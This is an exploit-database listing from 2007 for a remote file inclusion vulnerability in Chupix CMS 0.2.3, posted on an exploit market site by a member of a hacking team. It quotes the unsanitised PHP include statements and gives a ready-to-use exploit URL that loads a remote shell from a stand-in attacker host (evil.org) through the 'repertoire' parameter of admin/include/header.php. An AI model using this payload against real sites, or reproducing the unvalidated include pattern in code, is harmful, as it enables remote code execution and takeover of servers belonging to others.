[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Chupix CMS 0.2.3 (repertoire) Remote File Inclusion Vulnerability

Author
0in
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-2174
Category
web applications
Date add
26-09-2007
Platform
unsorted
=================================================================
Chupix CMS 0.2.3 (repertoire) Remote File Inclusion Vulnerability
=================================================================



#chupix 0.2.3 /admin/include/header.php RFI
#f0und by 0in
#Greetings to:Die-angel,Slim,Joker186,Kaja,Artysta,wojto111,reydex
#team:Our Dark-Coders team;]
--------------------------------------------------------------------------------------------------------------------
#register_globals=On
BUG:
include($repertoire .'db/config/config.php');  // lecture de la configuration souhaitee par l'utilisateur
 include($repertoire .'include/template.php');             // classe de creation des templates
 include($repertoire .'include/MyTxt.php');                // inclusion de la classe MyTxt
 $path_lang = $repertoire ."langues/". $conf__lang ."/admin.php";
 include($path_lang);                                      // Chargement du fichier de langues

EXPLOIT:
http://x.com/[patch]/admin/include/header.php?repertoire=http://evil.org/shell.txt ?
--------------------------------------------------------------------------------------------------------------------



#  0day.today [2024-12-25]  #